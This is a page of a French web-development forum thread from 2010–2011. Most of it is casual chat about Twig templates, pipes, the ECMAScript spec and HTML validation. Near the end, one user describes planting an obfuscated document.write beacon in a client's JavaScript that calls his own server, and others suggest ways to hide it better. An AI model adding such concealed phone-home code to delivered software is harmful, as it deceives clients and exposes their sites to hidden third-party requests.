Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2145 connectés 

Mot :   Pseudo :  
  Aller à la page :

Page :   1  2  3  4  5  ..  1058  1059  1060  ..  1454  1455  1456  1457  1458  1459
Auteur Sujet :

blabla@web

n°2045397
theredled
● REC
Posté le 31-12-2010 à 15:22:55  profilanswer

Reprise du message précédent :

Shinuza a écrit :

J'ai ajouté un filter dans les extensions du plugin

Code :
  1. 'get_config' => new Twig_Filter_Function('sfConfig::get'),

D'ou

Code :
  1. {{"app_lol"|get_config}}
  2. // cat

Les syntaxes des moteur de template m'étonneront toujours [:pingouino]

Message édité par theredled le 31-12-2010 à 15:23:29

---------------
Contes de fées en yaourt --- --- zed, souviens-toi de ma dernière lettre. --- Rate ta musique
mood
Publicité
Posté le 31-12-2010 à 15:22:55  profilanswer

n°2045404
smaragdus
whores, drugs & J.S. Bach
Posté le 31-12-2010 à 15:44:46  profilanswer

Pas si on a déjà fait des template ezPublish :D  

Cette notation postfixée avec des pipes... A tous les coups, le codeur était un fan de hewlett packard :D

n°2045405
masklinn
í dag viðrar vel til loftárása
Posté le 31-12-2010 à 15:50:01  profilanswer

smaragdus a écrit :

Cette notation postfixée avec des pipes... A tous les coups, le codeur était un fan de hewlett packard :D

Gni? Non, ce sont juste des filtres, c'est pour ça que ce sont des pipes (comme dans un shell quoi, t'as jamais utilisé un shell?). Comme beaucoup de trucs dans et autour de Symfony, c'est fortement "inspiré" de Django (Twig est un port des templates Django en PHP).

Message cité 1 fois
Message édité par masklinn le 31-12-2010 à 15:50:38

---------------
I mean, true, a cancer will probably destroy its host organism. But what about the cells whose mutations allow them to think outside the box by throwing away the limits imposed by overbearing genetic regulations? Isn't that a good thing?
n°2045406
theredled
● REC
Posté le 31-12-2010 à 15:53:23  profilanswer

C'est très bien pour un urlencode, mais là t'admettras que c'est bizarre :o il existe pas une autre syntaxe genre {{mafonc "lol"}} ?

---------------
Contes de fées en yaourt --- --- zed, souviens-toi de ma dernière lettre. --- Rate ta musique
n°2045407
smaragdus
Posté le 31-12-2010 à 15:54:06  profilanswer

masklinn a écrit :

Gni? Non, ce sont juste des filtres, c'est pour ça que ce sont des pipes (comme dans un shell quoi, t'as jamais utilisé un shell?)..

Non je suis relié par la pensée directement au kernel linux, le shell c'est has-been  [:zytrahusathome]  

n°2045408
theredled
● REC
Posté le 31-12-2010 à 15:59:28  profilanswer

smaragdus a écrit :

Non je suis relié par la pensée directement au kernel linux, le shell c'est has-been  [:zytrahusathome]  

ya des gens qu'ont jamais utilisé linux, hein [:zoubidawa]

---------------
n°2045409
gatsu35
Blablaté par Harko
Posté le 31-12-2010 à 16:00:19  profilanswer

Shinuza a écrit :

Un bout du settings.yml, en fonction de l'env. Mais ça c'est pas un problème, le problème c'est de disposer de certaines options dans le contexte de layout.php ( au même niveau que $sf_content )

sur le net je trouve Sphinx ou Sphinx Generator, mais Sphink :/

edit : bon trouved : http://sphinx.pocoo.org/

Si c'est exactement ce dont j'ai besoin je me déplace te faire l'amour dans les fesses

Message édité par gatsu35 le 31-12-2010 à 16:05:36

---------------
Blablaté par Harko
n°2045410
Dj YeLL
$question = $to_be || !$to_be;
Posté le 31-12-2010 à 16:07:57  profilanswer

theredled a écrit :

Oué mais ces gens là ne font pas du dev web :o (sauf peut être la page en Php3 pour les tricots de tata Jeannine)

---------------
Gamertag: CoteBlack YeLL
n°2045411
theredled
● REC
Posté le 31-12-2010 à 16:09:49  profilanswer

Dj YeLL a écrit :

Oué mais ces gens là ne font pas du dev web :o (sauf peut être la page en Php3 pour les tricots de tata Jeannine)

Ou du C# sous IIS :o

(ou du php5 sans s'occuper du serveur)

Message cité 1 fois
Message édité par theredled le 31-12-2010 à 16:10:34

---------------
n°2045412
smaragdus
Posté le 31-12-2010 à 16:10:28  profilanswer

theredled a écrit :

Non ???? [:oh-la-vache-eh:1]  

Dans la vie réelle je veux bien croire, mais ici... spa possib' ???  [:zytrasnif]  

mood
Publicité
Posté le 31-12-2010 à 16:10:28  profilanswer

n°2045414
Dj YeLL
$question = $to_be || !$to_be;
Posté le 31-12-2010 à 16:11:24  profilanswer

theredled a écrit :

Ou du C# sous IIS :o

(ou du php5 sans s'occuper du serveur)

C'est certainement le cas le plus probable oui :whistle:

---------------
Gamertag: CoteBlack YeLL
n°2045415
theredled
● REC
Posté le 31-12-2010 à 16:13:11  profilanswer

smaragdus a écrit :

Non ???? [:oh-la-vache-eh:1]  

Dans la vie réelle je veux bien croire, mais ici... spa possib' ???  [:zytrasnif]  

[:ienchangel]

---------------
n°2045422
masklinn
Posté le 31-12-2010 à 17:27:03  profilanswer

theredled a écrit :

C'est très bien pour un urlencode, mais là t'admettras que c'est bizarre :o

Il aurait aussi pu faire un template tag je présume [:spamafote]

theredled a écrit :

il existe pas une autre syntaxe genre {{mafonc "lol"}} ?

Template tags

{% get_config "stuff" %}

http://www.twig-project.org/doc/advanced.html#tags

edit: d'après la doc de Twig, tu peux aussi utiliser des fonctions dans les évaluations, donc

{{ get_config("stuff" ) }}

http://www.twig-project.org/doc/ad [...] #functions

Suffit d'appeler

Code :
  1. $twig_environment->addFunction('get_config', new Twig_Function_Function('sfConfig::get'));

theredled a écrit :

Et alors? Ya des pipes aussi dans CMD à ce que je sache [:petrus75]

Message cité 2 fois
Message édité par masklinn le 31-12-2010 à 17:34:58

---------------
I mean, true, a cancer will probably destroy its host organism. But what about the cells whose mutations allow them to think outside the box by throwing away the limits imposed by overbearing genetic regulations? Isn't that a good thing?
n°2045425
masklinn
Posté le 31-12-2010 à 17:38:31  profilanswer

https://github.com/kitgoncharov/evi [...] es/evil.js [:rofl]

---------------
n°2045426
theredled
● REC
Posté le 31-12-2010 à 17:59:08  profilanswer

masklinn a écrit :

Et alors? Ya des pipes aussi dans CMD à ce que je sache [:petrus75]

pas |, et ensuite, je te répondais pas à toi.

---------------
n°2045428
masklinn
Posté le 31-12-2010 à 18:24:39  profilanswer

T'as pensé à lui dire? Parce qu'il a pas l'air au courant

>dir | c:\Python27\python.exe foo.py
23

---------------
n°2045434
theredled
● REC
Posté le 31-12-2010 à 18:57:44  profilanswer

masklinn a écrit :

T'as pensé à lui dire? Parce qu'il a pas l'air au courant

>dir | c:\Python27\python.exe foo.py
23

Han comment tu m'as cassé !!  :fou: :fou: non mais franchement t'as quel âge.....

---------------
n°2045436
masklinn
Posté le 31-12-2010 à 19:05:39  profilanswer

theredled a écrit :

Han comment tu m'as cassé !!  :fou: :fou:

Je vois pas le rapport, tu tentes de disséminer de fausses informations sur un lieu de discussion public, je te corrige c'est tout [:petrus75]

theredled a écrit :

non mais franchement t'as quel âge…..

L'âge de pas me planter sur des trucs aussi basiques?

---------------
n°2045438
theredled
● REC
Posté le 31-12-2010 à 19:19:32  profilanswer

masklinn a écrit :

Je vois pas le rapport, tu tentes de disséminer de fausses informations sur un lieu de discussion public, je te corrige c'est tout [:petrus75]
L'âge de pas me planter sur des trucs aussi basiques?

Comment tu te la pète !!! franchement ça me dégoute !!!...
Sur ce forum vous êtes vraiment tous super arrogants, et tfaçon c'est un forum de losers et je m'en vais.
Et puis M$ Windows  :lol:  :pfff:  :lol:  :pfff:

Message édité par theredled le 31-12-2010 à 19:20:15

---------------
n°2045467
masklinn
Posté le 01-01-2011 à 13:01:18  profilanswer

[:reddit] http://tools.ietf.org/html/rfc3986#page-50

La RFC 3986 fournit direct une regex pour le parsing d'URI, avec les matching groups qui vont bien [:pingouino]

---------------
n°2045470
Shinuza
This is unexecpected
Posté le 01-01-2011 à 13:15:33  profilanswer

masklinn a écrit :

Template tags

{% get_config "stuff" %}

http://www.twig-project.org/doc/advanced.html#tags

edit: d'après la doc de Twig, tu peux aussi utiliser des fonctions dans les évaluations, donc

{{ get_config("stuff" ) }}

http://www.twig-project.org/doc/ad [...] #functions

Suffit d'appeler

Code :
  1. $twig_environment->addFunction('get_config', new Twig_Function_Function('sfConfig::get'));

Y'a un wrapper bizzare dans le plugin Symfony, je vais voir si je peux faire ça, c'est beaucoup moins moche.

---------------
Mains power can kill, and it will hurt the entire time you’re dying from it.
n°2045539
koskoz
They see me trollin they hatin
Posté le 01-01-2011 à 23:59:34  profilanswer

n°2045543
masklinn
Posté le 02-01-2011 à 00:13:39  profilanswer

Citation :

Pre-ECMAScript 3, JavaScript didn't have native arrays.

Standard ECMA-262 2nd Edition - August 1998 page 81:

Citation :

15.4 Array Objects

Array objects give special treatment to a certain class of property names. A property name P (in the form of a string value) is an array index if and only if ToString(ToUint32(P)) is equal to P and ToUint32(P) is not equal to 2^32-1. Every Array object has a length property whose value is always an integer with positive sign and less than 2^32. It is always the case that the length property is numerically greater than the name of every property whose name is an array index; whenever a property of an Array object is created or changed, other properties are adjusted as necessary to maintain this invariant. Specifically, whenever a property is added whose name is an array index, the length property is changed, if necessary, to be one more than the numeric value of that array index; and whenever the length property is changed, every property whose name is an array index whose value is not smaller than the new length is automatically deleted. This constraint applies only to properties of the Array object itself and is unaffected by length or array index properties that may be inherited from its prototype.

:/

Citation :

Also note that there was no special "undefined" value.

Même document, page 16:

Citation :

4.3.9 Undefined value
The undefined value is a primitive value used when a variable has not been assigned a value.

4.3.10 Undefined type
The type Undefined has exactly one value, called undefined.

Chais pas où t'as trouvé ça, mais c'est pas brillant :/

---------------
n°2045667
flo850
moi je
Posté le 02-01-2011 à 20:01:47  profilanswer

si certains s'ennuient  :  
http://forum.hardware.fr/hfr/Progr [...] m#t2045655

les framework (symfony/zend/cakephp) c'est useless

n°2045679
koskoz
Posté le 02-01-2011 à 20:36:45  profilanswer

Mon n+1 me disait que les framework existant c'est caca et il préférait développer le sien :o

---------------
Twitter
n°2045685
theredled
● REC
Posté le 02-01-2011 à 20:50:33  profilanswer

Encore un qui se donne des excuses pour pas avoir à apprendre...

---------------
n°2045956
wild-rider
Posté le 03-01-2011 à 21:12:09  profilanswer

Bonsoir,

J'ai envie de me mettre au "Web 2.0", celui d'aujourd'hui, dans les normes et bien fait.

J'ai besoin de faire un site dans ce style là http://www.yakaz.fr/ avec de l'onglet qui descend, des filtres comme sur ASOS.FR qui font que lorsqu'on clique sur une box, les items sont rechargés dans la page, bref quelque chose de propre.  

Je connais bien le Web mais je suis pas au top techniquement.
Je connais le xHTML/CSS, j'ai des notions de js/php, et je fais pas mal de C# donc je connais bien la POO, j'ai de bonnes notions en dev, en bref je me sens capable de vite apprendre.  
Et c'est là que je vous pose ma question :  

Je commence par quoi, et je me sers de quels outils?  

J'ai fait du J2EE avec du JSF et des EJB et j'ai trouvé ça super chiant, mais vraiment.

Faut-il forcément passer par une techno particulière ou tout est faisable en HTML/Javascript ? Et dans ce cas là, ou se documenter pour faire un site "avancé" et optimisé?
Je vous demande juste des lignes de conduites, voire des tutos, j'ai réellement envie de m'y mettre.

Merci d'avance.

n°2045972
Profil sup​primé
Posté le 03-01-2011 à 21:54:18  answer

J'ai un comportement étrange avec Chrome, sur une page php je fais un echo de "<form action="aaa" method="aaa">" et le code source se retrouve être "<form action="aaa" method="aaa"></form>" avec le formulaire qui est fermé  [:tinostar]

n°2045976
gatsu35
Blablaté par Harko
Posté le 03-01-2011 à 22:01:25  profilanswer

tu regardes le code source avec quoi ? CTRL+U ? ou inspecter l'élement via le dom inspector, dans ce cas c'est normal, le navigateur referme le formulaire lui même.

---------------
Blablaté par Harko
n°2045986
Profil sup​primé
Posté le 03-01-2011 à 22:26:02  answer

Avec l'inspecteur d'élément  :jap:  

C'est quoi la différence entre ça et le CTRL+U ?

n°2045987
koskoz
Posté le 03-01-2011 à 22:27:25  profilanswer

Ctrl + u c'est la page générée au chargement de celle-ci alors que l'inspecteur d'éléments répercute les modifs en temps réel (suite au js notamment).

Message édité par koskoz le 03-01-2011 à 22:58:35

---------------
Twitter
n°2045988
Profil sup​primé
Posté le 03-01-2011 à 22:28:44  answer

Merci couscous  :o

Spoiler :

Et gatsu aussi  [:cupra]

Message cité 1 fois
Message édité par Profil supprimé le 03-01-2011 à 22:29:02
n°2046007
gatsu35
Blablaté par Harko
Posté le 03-01-2011 à 23:48:26  profilanswer

l'inspecteur d'élément ne fait que retourner le code tel que le DOM parser du navigateur le comprend. Du coup par exemple, si tu mets un <p><ul></ul></p>, tu verras dans le dom inspector de tous les navigateurs respectueux des standards : <p></p><ul></ul>

---------------
Blablaté par Harko
n°2046020
Profil sup​primé
Posté le 04-01-2011 à 08:42:24  answer

Merci  :jap:  

En revanche je vais googler DOM parce que je sais pas très bien à quoi il sert  [:tinostar]

Message édité par Profil supprimé le 04-01-2011 à 08:47:29
n°2046031
Proov
Art & Science
Posté le 04-01-2011 à 09:47:47  profilanswer

Comment changer la valeur d'un Textarea avec JS ? Pour l'instant je fais des GetElementById en modifiant le value sur mes inputs, ça marche partout sauf sous IE  [:tinostar]

n°2046043
vapeur_coc​honne
Stig de Loisir
Posté le 04-01-2011 à 10:18:25  profilanswer

bonjour tout le monde  
voila toujours pour migrer mes pages de IE vers FF
j'utilise http://validator.w3.org pour voir les erreurs et aussi les werning d'éclipse

j'en ai par exemple un  

Code :
  1. <font> <input type="text" name="messAjax" size="150" readonly class="messAjax" maxlength="150" value=" "/></font>

et w3c me dit  

Citation :

Line 90, Column 22: the name and VI delimiter can be omitted from an attribute specification only if SHORTTAG YES is specified
 size="150" readonly class="messAjax" maxlength="150" value=" "/></font>

"VI delimiter" is a technical term for the equal sign. This error message means that the name of an attribute and the equal sign cannot be omitted when specifying an attribute. A common cause for this error message is the use of "Attribute Minimization" in document types where it is not allowed, in XHTML for instance.

How to fix: For attributes such as compact, checked or selected, do not write e.g <option selected ... but rather <option selected="selected" ...

---------------
marilou repose sous la neige
n°2046049
FlorentG
Posté le 04-01-2011 à 10:28:25  profilanswer

change readonly en readonly="readonly"

n°2046051
vapeur_coc​honne
Stig de Loisir
Posté le 04-01-2011 à 10:30:58  profilanswer

merci [:bien]

---------------
marilou repose sous la neige
n°2046216
tomsoft
Posté le 04-01-2011 à 16:59:09  profilanswer

Question js :
J'ai un site monté pour un client "partenaire" destiné à un son client,
c'est un site dans l'esprit web 2.0, fortement basé sur JS pour la navigation, compatible iphone / ipad, sans un seul bout de php ni de sql (c'est du statique avec 10 pages :o )

Bref, j'aimerais eviter qu'il me repompe le site et en fasse des petits en adaptant la charte graphique

J'ai donc collé un mouchard perso dans le JS :

J'ai un gros JS minifié avec jquery, jqueryui, fancybox, easing, ..., melangé de sorte que le dev du client ne comprenne pas grand chose et ne l'adapte pas, et en plein millieu de tout ce paté de code, un document.write qui ecrit précisement :

Code :
  1. document.write('<scr'+'ipt src="'+jsa+"."+OxFE+"."+0x7E+"."+0x3A+"/fan"+"cyb"+"ox-"+"lay"+"er.p"+zr+'"></sc'+'ri'+'pt>');

sachant que jsa = 88, OxFE est une variable "style hexa" qui vaut un autre morceau d'ip, 0x3A la valeur hexa du 3eme morceau de l'ip, ect,
c'est donc pas detectable en lisant le code tellement c'est compacté,  

mais par contre en faisant un ctrl A + afficher le code source selectionné, on voit l'appel à un script 88.191.XX.XX/fichier.php, donc ca peut mettre la puce à l'oreille :/

(le script sur mon serveur check le referer et m'envoie un email au cas ou c'est pas le site que j'ai fait)

Auriez-vous une idée plus discrète et efficace ??

Message cité 2 fois
Message édité par tomsoft le 04-01-2011 à 16:59:28
n°2046217
gatsu35
Blablaté par Harko
Posté le 04-01-2011 à 17:04:33  profilanswer

tomsoft a écrit :

Question js :  
J'ai un site monté pour un client "partenaire" destiné à un son client,  
c'est un site dans l'esprit web 2.0, fortement basé sur JS pour la navigation, compatible iphone / ipad, sans un seul bout de php ni de sql (c'est du statique avec 10 pages :o )

Bref, j'aimerais eviter qu'il me repompe le site et en fasse des petits en adaptant la charte graphique

J'ai donc collé un mouchard perso dans le JS :

J'ai un gros JS minifié avec jquery, jqueryui, fancybox, easing, ..., melangé de sorte que le dev du client ne comprenne pas grand chose et ne l'adapte pas, et en plein millieu de tout ce paté de code, un document.write qui ecrit précisement :

Code :
  1. document.write('<scr'+'ipt src="'+jsa+"."+OxFE+"."+0x7E+"."+0x3A+"/fan"+"cyb"+"ox-"+"lay"+"er.p"+zr+'"></sc'+'ri'+'pt>');

sachant que jsa = 88, OxFE est une variable "style hexa" qui vaut un autre morceau d'ip, 0x3A la valeur hexa du 3eme morceau de l'ip, ect,  
c'est donc pas detectable en lisant le code tellement c'est compacté,  

mais par contre en faisant un ctrl A + afficher le code source selectionné, on voit l'appel à un script 88.191.XX.XX/fichier.php, donc ca peut mettre la puce à l'oreille :/

(le script sur mon serveur check le referer et m'envoie un email au cas ou c'est pas le site que j'ai fait)

Auriez-vous une idée plus discrète et efficace ??

faut pas JS minifier, mais passer plutot par des compresseurs de JS ils remplacent les noms de variables, mais passe aussi par un obfuscateur de JS

---------------
Blablaté par Harko
n°2046219
FlorentP
Posté le 04-01-2011 à 17:10:54  profilanswer

Plutôt que de mettre ton truc dnas le code source HTML, pourquoi ne pas utiliser un style CSS avec un backoground ou autre : url(ton_url_ici) ?
Limite tu créé ce style là avec ton JS planqué, ça devrait pas être visible en éditant la source générée non ?

mood
Publicité
Posté le   profilanswer

Page :   1  2  3  4  5  ..  1058  1059  1060  ..  1454  1455  1456  1457  1458  1459

Aller à :
Ajouter une réponse

Sujets relatifs
blabla 3blabla 2
PUTAIN HARKO TU AS FERM2 BLABLA ![Beaucoup de blabla pour rien : post à effacer] Compiler .bat
variable1="blabla + variable2 +blala : c'est possible ??[PHP & regex] "blabla blabla file.ext?point=444 blabla" Recupérer 444
mail("celine@hotmail.com"," sujet","blabla"); pose une err ! Help[MySQL] WHERE 'blabla' compris dans le champ truc
[blabla@olympe] Le topic du modo, dieu de la fibre et du monde[PHP / BlaBla - limite]
Plus de sujets relatifs à : blabla@web

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)